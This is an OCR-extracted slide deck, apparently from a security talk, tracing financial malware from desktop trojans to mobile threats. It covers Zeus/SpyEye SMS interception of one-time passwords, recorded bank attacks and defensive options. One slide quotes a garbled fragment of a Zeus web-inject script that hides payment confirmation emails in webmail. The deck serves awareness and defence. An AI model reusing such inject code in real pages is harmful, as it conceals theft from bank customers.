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A quick (de)tour of desktop 
financial malware 
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A Brief History of Desktop Financial 
Malware 



• First generation: 2004-2005 

- Keyloggers 

- DNS changers 

• Second generation: 2006-2008 

- Plugin-based MitB 

- Remote control via C&C servers 

• Third generation: 2008 and beyond 

- Browser process alteration (hook) -based MitB 

- Configurable 
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mancial malware trick 



• Smart HTML injections (JS) 

• Dynamic injections (JS pulled from server) 

• Polymorphism, AV evasion 

• Dynamic Mule servers 

• IM human interface (e.g. Jabber) 

• Distributed C&C 

• Encrypted C&C traffic 

• Nifty server side GUI, DB, control panel 

• Botnet distribution "market" 
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Going mobile 
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Mobile Malware Myths 



• Mobile OS's are sandboxed 

-> We're safe! 

• Mobile apps are controlled 

-> Apple & Google watch our back 

• There's no money to steal in mobile apps 

-> Fraudsters don't care 
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Mobile Malware Evolution 
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Money-Making Mobile Malware 



• Gen 0: Phone-Bill Inflation Malware 

- Send high-cost SMS messages 

- Call international fee-based premium numbers 

• Gen 1: Credential stealing 

- DNS changer pharming attack 

• Gen 2: Bypass out of band authentication 

- Attack email, phone, SMS channels 

- Device takeover via SMS channel 

• Upcoming threats 

- Remotely controlled botnets 

- Attack mobile apps and mobile browsers 
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Gen & Malware Examples 



• Trojan- SMS. AndroidOS.FakePlayer 

- Duplicates payment approvals SMS messages sent to fee 
based sites 

- Distributed as non Android marketplace app, mainly 
from adult content sites 

• WinCE Terdial 

- Calls premium dial int'l numbers: calls Vanuatu, 
Somalia, Sao Tome 

- Distributed as Trojanized version of popular apps & 
games 
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Gen 1 & Malware Examples 



• iPhoneOS/ I kee.B 

- Changes local host settings to redirect bank customers 
to a phishing site 

- Distribution: spreads via the network among jail-broken 
iPhones 
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Gen 2 



Malware 
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2011 - the year of Mobile Malware 




Google's Android wears big 
bullseye for mobile ma I ware 
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Mobile Malware Threat: A Problem in 2011? 
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Could 2011 be the year when malware finally strikes personal and 
company-issued cell phones and smartphones? 



New banking malware 
intercepts mobile 
authentication 
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authenticate commercial transactions, an IT security company has claimed to 
have detected the first co-ordinated mobile and desktop malware attack. 

According to S21 sec, the new variant of the ZeuS trojan first infects the victim's 
PC. Then a web application purpoting to be from a bank asks the victim to input 
their mobile phone number and details of their device. Third, the victim is asked 
via text message to install an application on to the phone. This application can 
then be used to intercept any text messages the victim sends. 
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Generation 2 Mobile Malware 



• Attack the Out of Band channel 

- SMS 

- Phone 

- email 

• Eliminate, modify, and intercept: 

- Authorization messages 

- Notification messages 

- One-time passwords 

• First generation device takeover 

- Via the SMS channel 
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Legitimate Website 
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Zeus / SpyEye MitMo Capabilities 



• Attacks: BlackBerry, Symbian, Win Mobile 

• Commands delivered via SMS channel: 

- Display SMS: treat unmonitored SMS normally, display on the phone 

- Delete/Drop SMS: hide SMS from the user 

- Forward SMS: Send SMS to hacker without the user's knowledge 

- Block Calls 

- Remove Block Calls 

- Add Sender 

- Remove Sender 

- Set Sender 

- Block/Unblock Phone Numbers 
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Recorded Mobile Zeus/ Spyeye Attack 



• Sept 2010: 1 st observed attack 

- Zeus 

- Multiple Spanish banks 

• Feb 2011: 2 nd observed attack 

- Zeus 

- ING Poland 

• Apr 2011: 3 rd observed attack 

- Spyeye 

- Multiple German banks 

• Key takeaway: 

- Complex mobile-desktop operation to reach the money 

- What happens when money can be transferred by a mobile 
device? 
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generic downloader 



• Breaks out of the security sandbox via OS exploits 

- Patched in new OS version, but 99% of phones not upgraded 

- Roots the device to assume limitless control of the phone 

- Installs & downloads generic apps & sends data out 

• Google eventually removed from store and all devices 

• Key takeaways: 

- Mobile device sandboxing is software and prone to exploits 

- Mobile users don't update the OS - zero day vulnerabilities 
will have a long life 

- "Closed/controlled garden" can't guarantee freedom from 
malware 

- Shrink-wrapped Jailbreaking for arbitrary malware installation 
is here 
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Email channel attacks 



Zeus eliminates payment confirmation email 
from web mail 

- From a recent Zeus configuration: 



if( doc ume nt . get El e me n t By I d( " dat at a bl e " ) . r ows [ i ] . i nner HTML, i ndexOf ( "Faster Payment 
C o n f i r ma t i on" ) ! = - 1 | | 

document . get El ement By I d( " dat at a bl e" ). r ows [ i ]. i nner HTML, i ndexOf ( "Payment Created" ) 

) 

{ //Faster Payment Confirmation | Payment Created 

d o c u me n t . g e t E I e me n t B y I d ( " d a t a t a b I e " ) . r o ws [ i ] . s t y I e . d i s p I ay = "none"; 



• I mpact: users don't know funds were stolen 

- 2 nd line of defense breached 
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Future Threats 
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When Out of Band is I nband 



• On mobile devices, everything is 'in-band' 

- SMS, phone, email 

• Malware on the device controls all channels 

• Fraudster's operations dramatically simplified 

- Compare to MitMo Zeus 

• Email notifications can be tampered with 
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r based financial malware 



• Desktop financial concepts can be directly 
ported to the mobile 

- Browser tampering, Keylogging, plug-ins, add-ons, HTML 
injection, ... 

• Supporting technologies can be ported as-is: 

- Back end controls, GUI, databases 

- Distributed C&C 

- Encrypted C&C traffic 

- Mule servers 

• Malware downloaders are overcoming OS 
protections 
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Solution Landscape 
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• Anti-virus 

- Specifically for mobile devices 

• Secure Mobile Browsers 

- Dedicated hardened browsers for secured access 

• Application Hardening 

- Block malware's ability to attack apps 
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• Early stage mobile AV solutions are shipping 

• Typically signature based, extending desktop 
technologies to mobile devices 

• Expect similar issues as in the desktop: 

- Signature based detection prone to polymorphic malware 
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Secure Mobile Browsers 



• Hardened browsers dedicated to specific site 
access 

• Lock content 

- Site verification 

- MITM prevention 

- Pharming prevention 

• Validate device safety 

- Detect jailbreaks 

- Detect malware 

- Apply action policies based on risk 
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Secure App Developer Kits 



• Toolset for application developers to add 
hardening to their app 

• Dedicated to mobile device security: 

- Device risk assessment 

- Jailbreak detection 

- Malware detection 

- Memory encryption 

- Incoming & outgoing SMS controls 

• I ntegrate into the apps via API s 

• Update periodically with new detections and 
policies 
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• Financial malware is coming 

- All we've seen in the desktop world, +more 

- Accelerated pace 

• Convergence of channels eliminates the 'Out 
of Band' concept 

• Plan and prepare a strategy before rolling 
out your mobile app/ availability 
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